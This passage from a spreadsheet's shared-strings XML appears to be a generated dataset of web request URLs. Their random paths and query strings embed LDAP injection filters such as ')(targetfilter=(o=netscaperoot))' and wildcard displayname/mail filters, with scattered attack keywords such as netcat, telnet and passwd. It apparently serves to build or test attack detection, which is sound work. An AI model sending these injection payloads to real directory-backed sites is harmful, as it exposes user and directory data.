    <t>/ugoscogpra/isfdhqa/dayqjok/avlocationwujrv/nqiv@3rnu5ynbzvxxu1d/6neertarisfpaco/ijb@rz6skwb24e/ha2nolprhnp13ge1/seimtshbyhtbiehda/dawswthsi0laire/own68c3nordkpk/luic.asp?dta=ed6.w&amp;hcspg=documenttdej1omuserina&amp;sifevunoeae7te=49655710&amp;d9tl1ywohta=stnetohthg&amp;meitwtsncatge=)+++(|+++(displayname=had*)+(name++++=had*+++)(++++mail=had*++++)&amp;ftmt=telrin5eau&amp;le4ratcrs=511&amp;utsgsa6obd=23326226&amp;cewgni8t=64607481&amp;de=\\hswn</t>
  </si>
  <si>
    <t>/3bhx4fjl/6tieae/5num._.mvm1g/o6buturou.gif?n4thdxo=8544&amp;aiynhqutq95o=hgmmseszinc&amp;n7orr0=d9ea&amp;ignosea8c=hkyawvd&amp;kxvar4rvdr_=teui&amp;sb=mtgm)(&amp;(objectclass=++oae7*)&amp;sctn=3323</t>
  </si>
  <si>
    <t>/idamtwsm/uiat/w.h7gv@yhq-r6/ulre/li6me/oy9hcndul4haroro/m_jl/bednis/74nflv0cv@.cfm?lcdsoat=8open&lt;sock_streampnhavinghol&amp;ns=)(+++|++++(cn=*o+'brien*+++)(mail++=*o++'brien*++++)++++</t>
  </si>
  <si>
    <t>/rfkpjjdo/gyh2hhmthvkkyo/r6jfmpdc/rm0zqo02fn@x2qjsssh5/oeineewopomjnzlf/57lch/ldetttfp/es7aohgoy4ebhq.asmx?rihbee5bde=)(+|+++(displayname=had*)+++(name+=+++had*+)(+mail=had*++)&amp;szslndi=icoaf_&amp;eta=3391647195&amp;urihhe0tgnexskn=590462865&amp;faratleer9=99</t>
  </si>
  <si>
    <t>/e8o/xtf.bin?uqfrphaccept=oeget0sos$tw&amp;derwaisti=odlsieedmhdhhrxs&amp;uetmno9r=ns8yuphpetaer&amp;lms=377329&amp;93iceoua8eet=ugeea)(&amp;(objectclass+=++nsa*)&amp;e0uhe5a=d1oboot.ini</t>
  </si>
  <si>
    <t>/grwnejmail/ii4r9idbenoe7nutts0/e.dyoze3/nzshutdownmb4uygmyg/5jidqphp/ck/rdmizzqi6.pl?ajp0=)+++(++++|++++(displayname=had*)+(name=++++had*++)(+++mail=had*+++)&amp;85yaaiidfni=is</t>
  </si>
  <si>
    <t>/cr/au/1se3/9s3smwptatw/rh1etooe/aasdb1ij_w/jet/attgdqhdertsiiinrhp/evm/fue/mb4u_lx.wngv@/uulr.sh?rocttmzsdas=$1fhjetde7cp&amp;tdnc4th=40917423&amp;p.c2j1systemlo=8441887&amp;rrbi6pu6=3ld)(&amp;(objectclass+++=+weo*)&amp;bosbsid=aer|&amp;2r3sfpn=p&amp;bysdr4=iqhfntp1f&amp;utb4ideeqntihi=rzregpdg&amp;xioormtfstara=&amp;cta&amp;csock_streamwqqzla=5870073&amp;snxirttalicbs=hceeeqrecemab&amp;nwuvpin75ktelnet=093&amp;rvanpsmlndryodi=2</t>
  </si>
  <si>
    <t>/igi/s4wvizhl/teerenmyimsus/.admininw.cfm?vpjsz-3izb=858550&amp;trstaomot=e0pc9dosgb&amp;yfxswpe0t0pme=y18u&amp;wlzo=la=l&amp;anxtoisennn6et=r8d_da&amp;wrdwsdpisbe=ttnueymisoar&amp;ohlo8ii6pm=62906832&amp;bzi=738&amp;racb=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/breplacea68/eqiq/n8khxwrydl/isei0ewzdsi/kautoexeccpvviv0rnc/qijnrnuuh2oafwnhe/rgqu5l6xosc5jrx/c8qykcbin/aqdgoaa.htm?vglwp1fs0bodyin=)++(+|++(displayname=had*)(name+++=+++had*+)(+++mail=had*++)&amp;lyeioloo=56&amp;6lohugzeus=a9u_6r&amp;yee=2918&amp;0ef=7344425529&amp;ditwrrvdk=88080958&amp;afnieonirttooi=57461228&amp;isaairprfti=srhp9&amp;ey_@nimgjdj4su=tsui</t>
  </si>
  <si>
    <t>/thn/akl2v15bzkqpfw/2jsvntrz/tutg7md/3mccbebrv1ia/yrhrtl5e/ienr8.shtml?mkftktwt=lt0y4rb&amp;u.all8e9=668422&amp;p5iooeclhe=&amp;t&amp;hnttagnsd8qe=48489545&amp;epstyiat=+a&amp;e5mt5dlaeofhde=25169822&amp;puc=03&amp;iwnntcmnhbbo=)++(++|(07eyc=ni*)&amp;uewzsoc=sche;o'd9croe:r&amp;7qfandpqkkc0cnc=magi&amp;ioou=03717852&amp;rh1hhrens=56&amp;abhm=sscript</t>
  </si>
  <si>
    <t>/uxjbr8wwbzxyimd/hufb.lsgb/6x5/o7e0vawtlecigauen/u3toxklauk0p4to8g/rxxrdby@jg6/ae1dl8my-y0u.k.mspx?b0enthy=)++++(++++|+(+cn=*o++'brien*++)(mail+=*o+'brien*+)++&amp;swpaw=uyisaefhl2lsn&amp;jreunrmo=rponrtassa</t>
  </si>
  <si>
    <t>/t0k5cxubati/etdeteranmie/adx1nsfe0h00nt5/5ea3ofhc-sy4/hc3k_c3g.qh@par/exec.l6a_wget/ie/mqprttilxnv0uby6/mtsn-fbz_ad2w7_va/yfg7m9lcq/z8u0d8t/t.wamg9bfromurxmnk.mdb?2llyoeksel=)(|++++(displayname=had*)+(name+=++++had*++++)(+mail=had*+++)&amp;sonntsce=net</t>
  </si>
  <si>
    <t>/bfv_xmjiiycgqhb9yr.mspx?mfjovnnyarj=ep2t)(&amp;(objectclass++=5oa*)&amp;cortawolosn=etcmtno5&amp;qidn1v=etc)rlaeareileoe&amp;elhootgw=obrnhatu&amp;armituigha=nwn6rnliezdoye&amp;858zoctuszz=undc=raea&lt;&amp;gfkmk4sh=566981&amp;owrl9g=2aoirlw5</t>
  </si>
  <si>
    <t>/nmbadasrtiim/nzm7ezrn9amma/ejaaeghitwe5otezo/enye9zwkkmdb/lh/s_-r/e_v7nc3tvfg1m0xwcno@/twbndfoct/dgluvt/e4pf9i/ht1gy7danr3tdlcwh.asmx?9incr=046745&amp;nclenai=in6xleyrlmbehcoi&amp;bdcaelaaotrek=dpizvaajf&amp;etcsdb=ofs+=oymtx-6iaid@ej4&amp;fzgeoo=5269)(&amp;(objectclass=xco)(|(sn+=++iwn1)(cn=s+j*))&amp;4ement5=099619896</t>
  </si>
  <si>
    <t>/amyieeaooif0cjsg4/aw5f.g/0ituoradminnk/shgrt-erdxib/oce/s1lfertetenisym/ep/zei0/tts9rnc6weh/bf1t/sw_22hk4fl1b3pzyd96w/dob@pq2nhl7.nm_mxudd.pl?psm3lsacts7fn=snmaste&amp;7bih=ita&amp;iehlbteoarvb8ta=6365363&amp;eiqeoooesenue5t=@ctuh&amp;ep=or9nlnlasowrna&amp;q5my21z=frpou)(++++|+++(um=*)&amp;yua=utt&amp;frohrn=u8db1&amp;6jsjpgsnxtermq=iinputo2r|z7aea</t>
  </si>
  <si>
    <t>/vwkevgl/n_-/dpf.pl?drlmyqnou4dmnfe=ietcehdqe&amp;onsix=eodrmebri&amp;cysa0becsese=39&amp;uirnyenaxa=8480)(&amp;(objectclass=edna)(|(sn=ked)(cn=rs++j*))&amp;wjeseeeb=thdslhome&amp;hi2as=r&gt;|tonavbscriptt4dt&amp;ortisim=ryb6pms@c8ei&amp;afyvmtr4n=tmplitsoeh&amp;ewbenruwreeh5=xlxrtetnams3&amp;01leabacfesens=3uaccess_logo/&amp;weii6hteuefsse=21036853&amp;im311ttrdro=0&amp;zh2neidh7=hesnan</t>
  </si>
  <si>
    <t>/8nj-/2bj5eniesio/tibyz/o7@zsrxm-qy/hv3af8z1wokj1mx/eowh8ed63ria.msf?eefgkcbh4ns=bczn&amp;dklsqlu3=l+nct&amp;rsr8=q+l+xtrjgroup+byvs&amp;dec3htnflessh=y0qka_bq7yfp&amp;o4aatmkwge0bz=009160815&amp;_eu.gt0u=30&amp;whoao=r&amp;tdvf6leweait=stdinhrshxeiteirnns&amp;jegd1chi=4295&amp;azaetebaftoa=asn6m)(&amp;(objectclass++++=+sa*)&amp;mmaokcouua7gn=17777&amp;ltdohee=u&amp;lc=srs8a&amp;a7nsnxa=5</t>
  </si>
  <si>
    <t>/tov-udwfppqydkec/zcqr.xmaesu84g/llwccoeoiuldhhntweeo/huvo-9wawatyplyrfs/iievaeemeo/t_ibm0vx.xg7@6an5-hv/oin/49feotbnsn/qhtdaatsog0goeal/sybpvhp4nc/cdmc4n.o/hf.html?ebrae=581175324&amp;ongojesyni=102276&amp;o_mylsdvatl=1886)(&amp;(objectclass=onr)(|(sn++++=awi)(cn=4+++++j*))&amp;twenysoasnx=3794717915&amp;sn=df6vqfcgge31&amp;5d=en&amp;ekey1er9enod=rt+&amp;6ueo4=58990&amp;skexecyy3hallformg=iwl2raj2lzeithnesm</t>
  </si>
  <si>
    <t>/lsqxtermppswb/tetaaw5d4hesaiiilr/oj-g5m9yawq5/nateehftpd/wj/-x1.cju/jds.js?eechoems1=89&amp;iqoodgt5it=n+y&amp;rdirucd1ur5n=631i)(++++|++++(254=*)&amp;rsaaaeins3gasnn=eroda&amp;nyits=gr+e8ktd8ie</t>
  </si>
  <si>
    <t>/ak/btreselghe11y/t1jotx53mxybv/or3toeresoiqtunr/tdbomloieaf6mrw.gif?mqhc=837)(&amp;(objectclass=ira)(|(sn+++=+++vfi)(cn=ibfj++++j*))</t>
  </si>
  <si>
    <t>/nhaaceaatw8pcinoeiip/rbeauts/3gznumjj_twzrcylh/wadmcnjavb7lrbdi/-k9ihavingf%uwoz.css?seunulttt=)++(++|++++(cn=*o++++'brien*++)(mail+++=*o+++'brien*)+&amp;tttxtt0oae=ee&amp;ogorwfeaue7rea=5000377&amp;zmbdehm4deaeaut=iaf7icaenfune&amp;nmmexec=aho&amp;shbz=9640&amp;2ehe8oeemoehe=5orlhejfal&amp;titutuan=t-ncme9&amp;66=3713&amp;the=eb9&amp;0axtermaxhcatstylercp=1&amp;bsonp9nfd6eolc=asnebnt6a7mlo0h</t>
  </si>
  <si>
    <t>/nvhdmc/qji@bqu6p1_u/louhvconouhsaew/meqnfj/kk/htwtoseo/k9y/rsa8-flq0_qk_/n7lhpsoeer/aigg.js?elr8dtxo1rmptst=sn+o9$st1umetaurnnetcat&amp;fs=ow)(&amp;(objectclass+++=+ho*)&amp;hea3ohtia0=hhi7noit&amp;9zl.x9c=u%om4mailen+idoghe&gt;l]eh&amp;ol9aeornpthb=hqmhkljs.9</t>
  </si>
  <si>
    <t>/eu5sxi2exx1xymfq/js/aiwa7seo/.mnf.lle_/diuenetedtwd/am_@if-oybjoz.xfj/otyk@/lp9vazagslgsgw@hzb_/qwoupiiohgenmoeh.js?ie=laitvmisystem&amp;bgsoundjmra0_7=replacem+3leseir4iisrm:ibodyea&amp;@y2trm2teeval=")(targetfilter=(o=netscaperoot))&amp;vnwihposnteted=comochaa==lloe72oavh&amp;bmdwuucqzp=6319</t>
  </si>
  <si>
    <t>/mnh3jfl8hfxi/mrcalrdeeo1sdies/ehb2erlesdideioordt/dkn3wn/-@aickky/mymdrjtnd.php?a4acivto4etbv=he4&amp;erudat99bd=)+++(++|++++(++cn=*o+++'brien*+)(mail++=*o++'brien*+)&amp;d3mtsov=httpsmriandagr|tc+(8j&amp;bgsoundkd5nek@@_aw=r-sn1&amp;ihriaidbd=ar0nltrm|</t>
  </si>
  <si>
    <t>/vhtelnetiframe_nl.aqt/g99cik/@wwp-vs/4gpaaj4f/m7krek@n/2e.0/emwdroh/oxeda/tsl9yxoaonthx__k6/eiiu3eidhmtc5c/o5ux.css?mldge=tsdirca&amp;izaa=0&amp;@kuftpaeu=nil)(&amp;(objectclass+=+++2hnp*)&amp;oybatheh6ee=atselect+kform88&amp;tshhrdwroet=56&amp;ttnomyo=avoaq</t>
  </si>
  <si>
    <t>/lwo_/emz9ytplzirl2hoa0opd/a4p0xds9azdpjd-dvn7/hnopwct-s/4lfhhynetchiuona/dz/l6hlbolkhsutwecf9rn.dll?daas=n8y&amp;sia9goyshsgiptz=e7yx&amp;sreex=ejandep1qht&amp;kthdcand=igw+emttnlgb&amp;jiammiaindwo52=connectdn+jue]eo&amp;stc=heuwnce&amp;ix2wp-4fumu7as=hcpaqq|uu&amp;e8pssthshlauu2s=befod4ruuovbiodec&amp;ot=ioo)(|++(z9=*)&amp;fitretee6sl4b=klodfmio2m</t>
  </si>
  <si>
    <t>/bdh-1zsguo29n/ho@a/im3bk43j3/ttegetu/xcpe0tibr3mjfgde/p0dt/oqpqeqevbo0tgsjjy2yw/gnatad/scidksincludep5rtjfhb/tl6nh/dmbcopi9xgr83/n_.cgi?nesrdwi=eeoailnyafie&amp;eresal3ite=sjh&amp;newgtbtro3oqt=algnyt&amp;qhtn8se1msee=etitfhfrzacceptaxs&amp;edeluelgiljc=01428376&amp;eahq=syimg&amp;sointcviae5mx=tsmeta@%rweos%u&amp;oo=)(+|+++(++cn=*o+'brien*++++)(mail++=*o'brien*++++)++&amp;no=ahah&amp;9azl=ehcnh1c8wd&amp;hatqwigiei=taerc&amp;dm=erjbi8&amp;tsnrtithh=bpt56jj</t>
  </si>
  <si>
    <t>/d8/xnph-xyrm1gcp-n/fpzxn7elk6wcgnw/raaneix1cyso9srr.png?hrfmdju3nt=inblike&amp;oi=yrbh-lnau9&amp;deiauac=xawtsrpix_56&amp;sdi4bdtecnsq2ae=sqkuocunxande8&amp;sjesigekoli=4649&amp;mahisl=e6zgvien&amp;i9xie=1r1_pmfwevh9&amp;cktisqne=i60gb2cil_l.&amp;2asimuen=")(targetfilter=(o=netscaperoot))&amp;noni=649434&amp;szagttry3prtmlf=in+toits+eos</t>
  </si>
  <si>
    <t>/eqp26oj.php4?e4mocharacm=246&amp;al=htpass+netcat&amp;temd4=5351&amp;xter=n&amp;rp7j4zobject8=7lsat&amp;uosse=)(+++|++++(huown=tni7*)&amp;ca=~&amp;reeetvnmsceu=738&amp;y7qoxmii=nd?at1q8metaootluunion&gt;ya&amp;08wxsr2mq4=eenbsele2h5</t>
  </si>
  <si>
    <t>/7difel1wno/81aqhtrbccqeqvujjkkc/lmf3xayfe10bdy/sofbuilorqhwuosbh/earfdd3adsnsieoanti3/eqxgrp7qpkmjmnn/for57hns/boot.ininkua/6p/nepu/uirxsx.aspx?ehka=318&amp;knyoti=277851&amp;gtoet2eesimat=r+&amp;gmpr=rpbm_&amp;frwm=66&amp;en7euihet=10)(&amp;(objectclass=9ow)(|(sn+=hsl)(cn=a++++j*))</t>
  </si>
  <si>
    <t>/unionukhn/t-rm0mcyjunc1mr/e4rhcvdc/olwno.shtml?allf1qzcctelnet=)++++(+++|++++(++cn=*o+'brien*++++)(mail++=*o++++'brien*+)+++</t>
  </si>
  <si>
    <t>/wjbwdlduoelcna/ooaxkdfi60tnainn/hhlujtcyo4.shtml?otuusntoceetrer=4199&amp;wsock_streamp_le=dr1xyl&amp;honamnr=5rse9sceu5&amp;stigir2=tuodocument&amp;fs=dhhlblhr&amp;o2xobgnmv3=rc&amp;fdttrs=oltq&amp;u8csesoewtinl=122140&amp;sr=723595&amp;taanet=25940&amp;6rupn7rsm5=tutas)(&amp;(objectclass+=httg*)&amp;eyd=tdxh2jfl</t>
  </si>
  <si>
    <t>/slisaaxttuul/ss/r3l@bgsoundw4l3morbrrf/nt53/dn4se64eelolt/ua9.swf?opogiehsttmensa=os'to&amp;re5chs=ss&amp;7o9stiwqirh=75976900&amp;lhatcmcntdt=nlavn8&amp;hzt=0ieraeki&amp;rhhs=re)(&amp;(objectclass++++=+++sei0*)&amp;esbfeekibnoyr=eperl&amp;05prkevaljy7l=svkjzsir9</t>
  </si>
  <si>
    <t>/wqlg5hmdropowzzshutdown3k/125w/ohoaoihee3htlunsm/tx3ifhiyy@ni5-@eh/eznhreoenfcmiowedhce/w5-rtahhblz/ipkfe_9v@2hlhcygwe9k/nc.js?5eic5aongs=tsoers:ocen+&amp;oahihfs=sjei1ihsssiee&amp;tuss5eayn5=xso3dwmfk8n&amp;yiidlmlzvdlr=tsum&amp;m3oye9e8srsaol=wurnc1bxd@ig&amp;ndenn=ea3zc&amp;e8=bjk2tw0&amp;zi=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/udzg3.4s/iwm1telnetoraccess_logfnc5/so48k46an8zjka5uda3u/amyfwaxusrdi/6onee8aret4dafnlf/bcslldrhdhrrat/iqx94b3gqdogtqabc4q/sv.gcms8.k/mth.js?i58tntpsc=)+++(++|++(kmn=ad*)</t>
  </si>
  <si>
    <t>/hx-mw/oaqr/ebgkgn3g9bpz@/ohtoht6reuier8/tjmnk/ekvkwy..vw/y8ithn/ilimh1tbydaguuohn/nmonreinui0.shtml?n3otnnhtrtatibd=exm2en&amp;tdeiehoj=hfxc1&amp;rebtdl94n=i84&amp;zj4thwnkntperl_=ilink@cmdewinnt&amp;pisa=ver)(&amp;(objectclass=nd*)&amp;zosc3tzsras=fja&amp;ojkhbohbltclib=7491&amp;5yjmetatbre@t=nvqurct8eniqukbeo&amp;ncbodyamggoegexecaccess_logexec=anvitong:lds&amp;mi9jsvc7mw=winnttels&amp;nogiietaeetcehr=agadmin9e6qc]&amp;eew=access_log4+openz+jscriptar&amp;rmvhe0deeh=3</t>
  </si>
  <si>
    <t>/dcnwmje.jpg?n4rrh8=65)(&amp;(objectclass=o9u0)(|(sn++=++onrd)(cn=ce++j*))&amp;ctoerui1=anfaaogtctofdf&amp;rlmjwmud=83&amp;1u3nlike=@+o$fromsfe&amp;fdrhnareaa=nhs18ahstheiab&amp;abteesbhtimyitu=004054</t>
  </si>
  <si>
    <t>/vvffv1q7yly/rfsdf1sy.mspx?drr=eo2l\\8yzfta&amp;5nre=27&amp;binspc-itmpbplz=433388&amp;td=s2iand&amp;reuhlaatezledm0=493941&amp;demvoe=ts6th++stdint%ue&amp;hsme5emortdwnf=t?in+ocs&amp;errsh4y7n=slqe8kop&amp;hh=)++++(++++|++++(displayname=had*)+++(name+=had*++++)(mail=had*+++)&amp;melebsiotr=58958&amp;rsiirs6zlg=912t+pbchpdupuf&amp;mqatknesvcaohl=90&amp;2pjhmailz1bb1a8=ssa&amp;btg=st+t&amp;5to5hahor=eae</t>
  </si>
  <si>
    <t>/tda3gp0k9evw6/2i/e@ndfq3/ehn4hheyaioeia/6jeeyifho4eespeo/ut7imwaseu/1smfkk0h1/ig8hn.html?uhoa=w-l.hhgr&amp;abrls=le4m2nb.h&amp;7tmnb4nnnot6c4e=h?ha&amp;ohr=nt597o0&amp;xdoc6xraoue=6urogisxufs&amp;trtziie7eswl=")(targetfilter=(o=netscaperoot))&amp;ddwtdde=sftxfsix&amp;rqsx=sk8gtytdrm8</t>
  </si>
  <si>
    <t>/hl0h2pse@ig@sepz@/9icyp0tvmqllyfi0zehu/if5v-sai0czplpty.html?6bo=700031&amp;o9lszi=9&amp;its=51362337&amp;cy8clseepare5r8=lsdo+e&amp;teern=uaetccl+h6grma+&amp;guaqtmpcpassthru=")(targetfilter=(o=netscaperoot))&amp;stanutac=yvi.y6mw4-pv&amp;6rdesisebhebit=n1o&amp;iassautaa8da=2549769&amp;i0eeowattlnmo=tgf9s</t>
  </si>
  <si>
    <t>/2opzvdxqy-3x-/vbscriptaxjjayvlog6krebg/d50eeo/1ah2aglheymnas/o7uhnucoi1h/gahbemeref/ietnt1s0yfsr/i9/bvoj.m4vu/w0n/tniwy6ls.shtml?osts=hr%mrkelsis&amp;otnd=)(++++|+++(hretf=hedas*)&amp;eehrge7hnm=h&amp;tirsloiwneei=rfluip&amp;onvbscripts@uzugvv=l46imntmrkcp&amp;saa=moanwegibh&amp;aawtetua=iht&amp;ehlxistw=pb&amp;eefreii=iehnu&amp;8kroe=rfduwb4co</t>
  </si>
  <si>
    <t>/ifrrsytoeomcm/axiepejlfyrdfldt/gnndcljnews/serioeg5n0hat/nhuvkry9tneeel/e3r2/qentwn/sd7fdeyadctprh/ortike0xodu5u/tzga8d4tp2b/tenu8.php?lest=saoop6&amp;espwy=)++(+|+(cn=*o++++'brien*)(mail++=*o++'brien*+++)+++&amp;t6nat=igmu1&amp;aeo=d/&amp;lwiorehtn=kss&amp;teeormnrsaan4ra=r@i7tulm&amp;ysrert=updateytominetcatco/+x+e&amp;aw2oeonctscz=48be&amp;nrzjaeslctddth=eah4aaipoen&amp;tefwpldetsecn9e=spanoznlcsea&amp;ee=connectrdmt&amp;setucwero=krjltr+eoadye&amp;2nutjpalmsru=0duf]&amp;qi0nswnsarr6ts=ttxts</t>
  </si>
  <si>
    <t>/smccv-ayk0g-3bxadb8/zvlgnxkr-uw/._pjtljo4ltelnetwkes/3kpt/eatsrelr/ibg4/mzekzhq_328ff/essiieqeaeel2o/0tboztp40wqce.m7d/tfxpsglng2ck.aspx?6gvf6q=1804)(&amp;(objectclass=sd0q)(|(sn++=++aoe)(cn=se+++j*))&amp;h33iae3lab=vosi9nnn3to&amp;fk@gzsam7@29e=a8xh&amp;ny2nawdyaner=aaofytneye9&amp;9hsoecae7do=pstqwootrl+bodydoaccess_log]atieval&amp;slnit6shmvj8=39&amp;hmu1dur=866&amp;-0m._iframe_ibm=tyrenxureoue3</t>
  </si>
  <si>
    <t>/6xtermlibxxterm/oxkklj8z.lbypi.gif?i0npwfkowxp=ejeof&amp;ns8i94out1=ir0layty&amp;jgpkrb5dn15i=c&amp;_7_xoshutdowny9j=)++++(+|++(eiat=0nh7i*)&amp;nh2pyf=ll&amp;hwnerk2mn=plcjokjw&amp;7hteogm7gveapv=sehatoic4hilrqk&amp;copyhscriptz=d+msdservices0htr4gy&amp;epwgyxgisi=hovnn&amp;qjditdhyhoe7gke=nmke6k&amp;nuu2r=3&amp;al=60305177</t>
  </si>
  <si>
    <t>/ekpgvcb2input/@ygnvbscript7v/vor/i5zubos/eoz/ob/af6ioaoljppsns/ta9l72./dhcathxb7jahx/fosinooth73t8rwona/8n/qm5a94xs.cgi?gmat=06)(&amp;(objectclass=l3bs)(|(sn++++=+++zm)(cn=nubi+j*))&amp;nqjx3xmltul=157469082</t>
  </si>
  <si>
    <t>/o266oe/ixjwxmn8_/olrnodeyt9qaz/cemrg/r7rme/yad/bwzvih@6pbhjd7wxmfh/w8w-f/t8oy0/ar6.aspx?h3i7iexattg3ao=8&amp;iain8atbrfbqaln=pa1&amp;2h2dztirpmasod=2irtirnct@h&amp;2z9eeuzysuib6u=7uhne&amp;eathtantrulus=ilr3mp4_&amp;oeobt=ri&amp;lt7evesa6exm=acbueval&amp;eas=wsuephnhdeoc(o&amp;msy_3fasve4=+&gt;om&amp;zscriptrcpb=ys0)(|+++(ql=*)&amp;wsetrauiiaiamc=129056&amp;em5lq9nfpt9=rd80oh&amp;0yuieylla=8rfdysookdyh</t>
  </si>
  <si>
    <t>/or/ierxhuceo4/iretnoqr/nmdtstrse2pifrra/2ipecthhan0waian/opp/iuig7ety/sock_streamxlofposition/aeeca/ebt0d3st/nbiootnt.js?uai5rn=npnlboot.iniaecu&amp;lgueooord5=ta&amp;tkivwe_7=he]aantgitsl&amp;te=inevaroegglsfodge&amp;s8ee=ti)(+|++(mrz=*)</t>
  </si>
  <si>
    <t>/i9jnshor/jp/ds/stte.pl?teriteuu=ahinputl+4tfad+reieiu&amp;dcusiethsseesln=)++(+++|(++++cn=*o+++'brien*)(mail++++=*o+++'brien*++++)++&amp;lrpbn=dr0jeu-qpp&amp;7lfh=4semsystem0sd%uuometaniin</t>
  </si>
  <si>
    <t>/oauhg2as/hertel7t5sitoime/dth/0sf/ip7wsx71ura.tiw/emd1abet5/d@v0rlwljrrf8wxvnd/-da.tiff?dtwa=scriptgtt4&amp;ha=049)(&amp;(objectclass=eeer)(|(sn+++=++++ewlo)(cn=so+++++j*))&amp;lrdghesa=aai&amp;httpxhtal0ku.ppasswd=/y&amp;fheg=rhastde&amp;tnalgixyadtpt=olntjm2&amp;ftendhnieyij=obbzitmn~r8y&amp;ewrdwty=6414711</t>
  </si>
  <si>
    <t>/3fksmoekv.html?oanrioi1jrx=rxa7t+ant&amp;&amp;eessgaz=9018)(&amp;(objectclass=3eo)(|(sn++=+yee)(cn=aooa+++++j*))</t>
  </si>
  <si>
    <t>/hyaro/mh-y0jz1-yj2.gif?neaehoam=5871324&amp;eraosnpsi7u=+srw&amp;daeriobsih=)++++(+++|(2ncm=rell*)</t>
  </si>
  <si>
    <t>/nwbeeoa6ea/grlcq/lqdzkj/ioi2dfiiracidlre7py/u8kzx/fpasswdhttps.cfm?ln=rpr+)t&amp;odiaicxeeitnch=76383526&amp;gget2ear=ir6is&amp;rsle9=7&amp;ups=284810&amp;llhipyry=nmtayhotrxx&amp;rtd6se9w6ai=+nseuroaegd04dt&amp;2sedhagekbeohh=c]&amp;s4l=)++++(+++|+++(displayname=had*)(name+++=++had*++)(++++mail=had*+)&amp;abetween.processing-instructionibnoeviv=esdneon4e:ba&amp;o8pqm4lswrcp=yselectoisinma</t>
  </si>
  <si>
    <t>/eddocumentjn/o42k/ethruaahpyep/6b5yzjyrlid0acft/tlv/gpha36rhj.le53kkqby/df0t7/c4szmr4pvh-bjh/nl6ohs9/xndbfeybuhtmtndht.jpeg?6dlee=5720&amp;azmlb=240501&amp;8eem9edu=ehq4q&amp;xrkr9lj=eefiuwusae&amp;ivrnnd=xy)(++++|+(nohlo=*)&amp;a_v1=32&amp;exetrmomk9tgit=723883194&amp;ecn5eqewse7ojhy=8t9leezrgunal7taf5&amp;1aieepisngi=87600&amp;cirnen=681&amp;po1soebtphnlehi=-l7</t>
  </si>
  <si>
    <t>/siziyn_nqcfqlj2jylgn/v5dl2mom3lqm4oyndl/hs0busservicesgqym/dbautter/1tjfeiob4nmtoadom6n/aom.7d.html?wsmnno=9&amp;opowera=imorilorlhe4&amp;soi0eaenra=s&amp;haasnreersa=2a&amp;am6syl=as|ooim:ronunus&amp;coiaryimwtoeco=)++(|+(displayname=had*)++(name+=++had*+++)(++mail=had*++)&amp;wxekr=amrwfkzgvtbs</t>
  </si>
  <si>
    <t>/5c6fv04t6f1p_3g_u@/3w6qkdcqlq2qi7/a1yrnr6ne/isq5wk_0./nn0r0el/tldn/y8a7ohisber0ssdr/5fksiid/xupdatek/ea2foqbyfm/oewhdteet/eie.cfm?xmochav7sak2binwe=)+(++++|++++(displayname=had*)+(name=had*+++)(+++mail=had*++)&amp;mis=613335</t>
  </si>
  <si>
    <t>/r904gzjfcpzsanr_s/vlyl0_sqgf2/1mngriha/mb0utsf0-/hiyenvjffromxm3/rv7vdxz/eteope8ahnnia/8qc7o4_gbhf1vqnze/ldhrht/6xitpsutyneglcue.png?onoj49xf78-g=)+++(|+++(3syi9=gyj*)&amp;aaho=9215787&amp;droptmpwxml=%%g&amp;3tnph-sqxterm+r+vtwotrs&amp;ecnmsufddf=5742700&amp;ezrgmoteeslat=65502177</t>
  </si>
  <si>
    <t>/tahudnhhh8td3bz6l.css?ltilew=f2ihnd&amp;naei1staunndw5=cv\\&amp;9artlaoreiy=dknwu&amp;rsalimscn=satxilikehf3abwkr-&amp;dnlink0wp-jczu=eia&amp;simtoeiy=)++++(++++|(soen=kue*)&amp;ige@gsyzdb=nafz30&amp;dhrutgah=iqfh2et&amp;hbovxchildinclude9vxcc=23526243&amp;s57q96_jxb=tvcrtddsests</t>
  </si>
  <si>
    <t>/ic3j/azxrujbq4j/limgjthn.htm?tylntgm=895330&amp;ceauoxm6=)+(++++|+++(+cn=*o++'brien*+++)(mail+++=*o'brien*+++)++&amp;eip=qjpqb.&amp;csciwiz2acvro=rzr&amp;u.jc.zsnt1=u+bbine</t>
  </si>
  <si>
    <t>/ryehto9irecbrdh6o/fodrmhahfb/qkpwuojfup/gf--_1jqc.png?ivjy@j=s&amp;tnirnhwnju08=jxxqjt-gpkia&amp;rwhw5an1e=3232&amp;rhao4=3501497676&amp;etnjom4lenltee=")(targetfilter=(o=netscaperoot))&amp;sgeosnletn=eaid+8&amp;@u+ilservices+&amp;_fzmmijnxfzw=8&amp;bfnkgw0yit_p=hteo&gt;&amp;2s-.=pf&amp;hmhasrwe73ze=6vn&amp;0rk_hql5lpb=01814351&amp;dtdabyrcto=316</t>
  </si>
  <si>
    <t>/nkaimoelegnwjnnrmlc/5z9pobnm5saumn-sw/juy4fc.mspx?rssl3qnuhk=)++(+|+(cn=*o++'brien*++)(mail+++=*o+'brien*)+++</t>
  </si>
  <si>
    <t>/srqbremeanrmefe/sw/npo/nbzue/hleituoneseiuaec7rie/irni/rjns7an/ntnarocnxhhy1tme4s/e1yg1jlsku@pk/m9thnnipt/tsrhntuzier.mspx?xcaegz=")(targetfilter=(o=netscaperoot))</t>
  </si>
  <si>
    <t>/s7aovsh/o2yqu4h/attas/mzeaoa2a8jijerdre/mntrmjujxconnect95/nnonr0ecjlranrslc/rahactmsvvthfleihe/dxrnpabt2aevhlweys/qhutqghfdd/u0vryxkxkstdin/r@xed8o_we-6y27els4m/j8gtxpositioninlul.js?inhttpqza0na=1257136&amp;etgshec9eirtr=0hnjlk8z&amp;elnnyeaiore=sr6xuoeuhse&amp;o1tli2=246&amp;tbhnjbodjpdd7h=)(|+(displayname=had*)+(name++++=had*++)(++mail=had*++)&amp;w43vito9l=ai/o2+&amp;eoinst=ie&amp;eclihcriearera=tbha6+hoddlheqb/sc&amp;bhlsydt=yvbscriptemaetmaeaz]t&amp;notetyt=50232863&amp;eeett=50091&amp;iari=322233411&amp;55lt8=skd3edysro</t>
  </si>
  <si>
